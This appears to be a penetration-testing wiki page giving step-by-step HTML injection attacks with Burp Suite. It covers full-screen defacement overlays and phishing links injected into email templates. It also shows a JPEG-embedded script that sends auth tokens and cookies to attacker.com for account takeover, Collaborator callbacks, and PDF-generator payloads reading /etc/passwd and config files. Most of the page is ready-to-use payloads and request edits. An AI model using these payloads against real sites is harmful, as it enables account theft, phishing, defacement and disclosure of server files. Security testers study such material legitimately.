HTML Injection

Check List

Methodology

Black Box

Stored

Go to any page that has a user-editable rich text field ticket or description, comment, bio

Enter normal text like test <b>bold</b> test and submit

View the saved content with another user or in private mode, if bold renders as bold text, limited HTML is allowed

Intercept the save/create request with Burp Suite and send to Repeater

In the parameter that contains the user input and replace the value with this breakout + overlay payload

"><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div>

If ظthe input is already inside a tag wrapped in <p> use this version

</p><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div><p>

Send the request and let the content be saved

Log in as a different user or open incognito/private window and visit any page that displays the saved content dashboard, ticket list, profile page, forum thread,

If the entire screen becomes completely black and nothing is clickable Full visual defacement via Stored HTML Injection with style attribute is confirmed

Works on every platform that uses whitelist-based HTML Sanitization and allows the <style> attribute on <div>, <h1>, <b>, <i>, <a>,

Email HTML Injection

Go to any property valuation, booking request, or contact form that sends user input to an email template

Fill the form normally (especially the address or street, city field and intercept the POST request with Burp Suite

Send the request to Repeater

In the JSON body, locate the address-related fields commonly street, formattedAddress, address, location, city

Replace the street or formattedAddress value with your attacker-controlled URL For Example

"street": "https://attacker.com",
"formattedAddress": "https://attacker.com"

Full example payload works on any similar endpoint

{
  "address": {
    "street": "https://attacker.com",
    "formattedAddress": "https://attacker.com",
    "city": "Click here for your free valuation",
    "postalCode": "https://attacker.com"
  },
  "email": "victim@company.com",
  "name": "Please click the link below"
}

Send the request – it will succeed (no 403 if the field is not validated)

Wait for the confirmation or booking email to be sent to the admin/agent/staff

When the victim (employee) opens the email, the address field will be rendered as a clickable link pointing to https://attacker.com

If the victim clicks it Successful Email Template Content Spoofing Phishing via Trusted Domain confirmed

Email Invite Manipulation

Navigate to your project settings page

Change your project name to a payload such as

<img src="https://miro.app.com/v2/resize:fit:720/format:webp/0*y2OAF_DSarBAjihO.jpg">

Go to the Invite Members section and send an email invitation to any email address you control

Open the received email

You will notice that the HTML image is rendered inline in the email body, proving successful injection

Account Takeover

Go to your profile/shop bio or any field that allows limited HTML

Enter this exact HTML structure and save it

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/your_image_id?options[delivery_type]=upload">Next page →</a>
</div>
</div>

Upload any valid image to the site (via avatar, product image, shop banner anywhere that uses Cloudinary

After upload, grab the image ID from the final URL usually looks like s--AbCdEfGh--/v1234567890/image_name.jpg → your_image_id = s--AbCdEfGh--)

Replace your_image_id in the href above with your real Cloudinary image ID

Use a hex editor (https://hexed.it or local tool) to open your original image file

Go to offset 0x1A (or any safe location after JPEG headers) and insert your XSS payload exactly like this

<script>fetch('https://attacker.com/steal?token='+localStorage.getItem('auth_token')+'&cookie='+document.cookie)</script>Save the modified image as new file (still valid JPEG)

Save the modified image as new file (still valid JPEG)

Update your bio HTML with the new image ID and exact parameteroptions[delivery_type]=upload

Final working bio payload

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/s--NewMaliciousID--/?options[delivery_type]=upload">Next →</a>
</div>
</div>

Save the bio and Now go to any victim's shop page or wait for anyone to view your shop/profile

When they click the "Next page →" link → jQuery replaceWith() loads your raw image bytes via same-origin → your embedded executes → localStorage token + cookies stolen → Account Takeover achieved

Send Message Functionality HTML Injection to Server Side Request Forgery

Log into the target site and check if there is a point in the application that sends a message to another user or as an email, and find the Send Message functionality or Email Form

Enter a normal email like test@example.com and submit the form

Intercept the POST request with Burp Suite and send to Repeater

In the email parameter, replace the value with this exact payload

<script>alert(1)</script>

Send the request and check if the alert pops or if the script renders

If no alert but the field allows injection without @ symbol, try a basic HTML breakout

Send and refresh the page or view as another user and if Hello renders, HTML Injection confirmed Then escalate with an external image load

hello"><h1><img src="https://miro.medium.com/v2/resize:fit:1400/0*y2OAF_DSarBAjihO.jpg"></h1>

If the image loads from third-party, SSRF potential confirmed

Then use Burp Collaborator for IP exfiltration

hello"><h1><img src="https://*.burpcollaborator.net/hacked.jpg"></h1>

Submit and check Burp Collaborator for HTTP/DNS interactions,if callback received, SSRF + CSRF via IP leak confirmed

Test the email parameter on other input endpoints like /contact, /feedback, /reset, /signup, or /profile as they often reflect input without @ validation

Server File Reading via PDF Export

Go to any file upload feature that supports PDF export like reports, invoices, profiles, documents, attachments

Upload a normal file with a safe name like test.pdf

Trigger PDF generation and download the file, open it to confirm filename appears inside

Intercept the upload POST request with Burp Suite and send to Repeater

In the filename parameter replace the value with this HTML breakout payload

"><h1>XSS Test</h1>

Send the request and generate a new PDF

Open the PDF, if <h1>XSS Test</h1> renders As large text, HTML Injection into PDF template confirmed

Then escalate with this JavaScript LFI payload (works in wkhtmltopdf, Chrome PDF, etc.)

"><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

Or for Windows servers

"><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///C:/Windows/system.ini");x.send();</script>

Generate the PDF again and open it, If /etc/passwd or system.ini contents are printed inside the PDF, Critical Local File Inclusion (LFI) via PDF HTML Injection confirmed

Then read other sensitive files

file:///etc/hosts
file:///proc/version
file:///var/www/html/config.php

White Box

Cheat Sheet

PreviousJavaScript Execution NextClient Side URL Redirect

Last updated 1 month ago